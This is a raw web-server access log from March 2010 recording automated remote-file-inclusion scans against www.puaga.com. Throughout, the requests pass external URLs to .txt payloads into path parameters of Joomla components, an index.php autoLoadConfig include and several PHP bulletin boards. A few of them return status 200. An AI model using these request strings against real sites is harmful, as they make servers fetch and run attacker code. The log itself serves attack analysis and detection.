91.121.25.16 - - [01/Mar/2010:05:54:18 -0800] "GET /logs/access_100221.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:54:18 -0800] "GET /logs/access_100221.log/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:10 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:10 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:10 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:10 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:11 -0800] "GET /logs/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:11 -0800] "GET /components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:11 -0800] "GET /logs/access_100217.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
213.171.218.166 - - [01/Mar/2010:05:57:11 -0800] "GET /logs/access_100123.log%20%20/components/com_sitemap/sitemap.php?mosConfig_admin_path=http://210.205.6.168/~shop/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:57:50 -0800] "GET /logs/access_100214.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:57:50 -0800] "GET /kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:05:57:50 -0800] "GET /logs//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:20 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:20 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:21 -0800] "GET /logs/access_100123.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:24 -0800] "GET /include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:24 -0800] "GET /logs//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:58:24 -0800] "GET /logs/access_100123.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:59:08 -0800] "GET /logs/access_100218.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:59:14 -0800] "GET /logs/access_100218.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:59:15 -0800] "GET /logs/access_100221.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:59:20 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
91.121.25.16 - - [01/Mar/2010:05:59:22 -0800] "GET /logs/access_100221.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
64.15.152.132 - - [01/Mar/2010:05:59:23 -0800] "GET /logs/access_100119.log//include/admin.lib.inc.php?site_path=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:01:47 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:01:47 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:01:48 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:01:48 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
216.104.40.170 - - [01/Mar/2010:06:02:46 -0800] "GET /logs/access_100127.log%20%20//kboard.php?board=sightseeing&cid=1&PageNum=10//kboard/kboard.php?board=free&act=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:08:19 -0800] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:08:19 -0800] "GET /logs/access_100218.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:08:19 -0800] "GET /logs/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:06:08:25 -0800] "GET /bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:06:08:25 -0800] "GET /logs//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:06:08:25 -0800] "GET /logs/access_100206.log//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
69.10.155.226 - - [01/Mar/2010:06:08:36 -0800] "GET /logs/access_100202.log//bbs//delete_comment.php?board_skin_path=http://suzuki9.fileave.com/zfxid1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:00 -0800] "GET /logs/access_100125.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:00 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:00 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:04 -0800] "GET /logs/access_100123.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:04 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:08 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:08 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:08 -0800] "GET /logs/access_100125.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:15 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:15 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:16 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:09:16 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:09:54 -0800] "GET /logs/access_100207.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:10:53 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:10:54 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:10:54 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:10:56 -0800] "GET /logs/access_100212.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:10:56 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:10:56 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:10:59 -0800] "GET /logs/access_100212.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:10:59 -0800] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:11:00 -0800] "GET /logs/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:11:01 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:11:02 -0800] "GET /logs/access_100118.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "MOT-MPx220/1.400 Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; Smartphone;" "www.puaga.com"
204.16.2.161 - - [01/Mar/2010:06:11:10 -0800] "GET /logs/access_100118.log/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://www.cepp56.com//editor/id.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows CE; PPC; 240x320)" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:12:24 -0800] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:12:25 -0800] "GET /logs//2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:12:25 -0800] "GET /logs/access_100214.log%20%20//2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:12:33 -0800] "GET /logs/access_100221.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:13:04 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:13:05 -0800] "GET /logs/access_100123.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:13:05 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:13:05 -0800] "GET /logs/access_100209.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.sanvan.net/new/cok.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:13:48 -0800] "GET /logs/access_100209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:13:48 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:13:48 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:09 -0800] "GET /logs/access_100209.log//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:09 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:09 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
123.143.29.250 - - [01/Mar/2010:06:14:20 -0800] "GET /logs/access_100215.log%20%20/skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.yuiworld.kr/bbs/data/sonota/id1.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:21 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:21 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:21 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:22 -0800] "GET /components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:23 -0800] "GET /logs/access_100201.log//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
200.93.147.154 - - [01/Mar/2010:06:14:24 -0800] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.dusteman.com/orca/.dUff/respon1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:38 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:38 -0800] "GET /logs/access_100209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:14:38 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:15:03 -0800] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.0" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:15:04 -0800] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [01/Mar/2010:06:15:04 -0800] "GET /logs/access_100209.log%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.u-star.org/site/bbs/calendar/idxx.txt??? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:15:42 -0800] "GET /2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:15:42 -0800] "GET /logs//2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
122.200.203.11 - - [01/Mar/2010:06:15:42 -0800] "GET /logs/access_100214.log%20%20//2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=http://www.samer1.net/space/ray/1.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:16:39 -0800] "GET /logs/access_100217.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:16:39 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:16:40 -0800] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [01/Mar/2010:06:16:41 -0800] "GET /logs/access_100209.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://comweb.webkebi.kr/~eco-max/gboard/lib/id1.txt???? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
